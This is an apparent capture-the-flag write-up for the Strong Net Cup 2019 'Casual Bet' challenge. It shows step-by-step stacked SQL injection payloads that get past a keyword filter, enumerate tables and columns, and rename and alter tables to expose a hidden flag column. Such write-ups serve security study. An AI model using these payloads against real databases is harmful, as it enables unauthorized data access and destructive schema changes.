Strong Net Cup 2019 - Casual Bet (Stacked Injection)

1'

So it is closed by single quotes

1' or 1#

Find out all the data in the table

1' order by 3#

So the number of fields is 2

1' union select 1,2#

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

It is found that many keywords are filtered, so it cannot be injected with union.Similarly, error injection cannot be used, because the statement of error injection is the same as that of union injection.

Use stack injection
1';show databases;#

1';show tables;#

1';show columns from `1919810931114514`;#

Let's look at the digital table. The back single quotation mark (`) is the quotation mark used by the database, table, index, column and alias. If it is a purely digital table, you need to add back single quotation marks. If it is not, you don't need to add or addIt doesn't matter.

1';show columns from words;#

Seeing the fields in the words table, we find that the underlying sql statement is the words table that is directly queried
select * from words where id=$inject limit 0,1;

But our current flag is in the digital table, and many keywords are filtered, we cannot directly query the digital table

By rename or alter, we change the words table to words1 or other names, then change the digital table name to words, and then change the flag field name in the new words to id

1';rename table words to words2;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;descwords;#

1' or 1#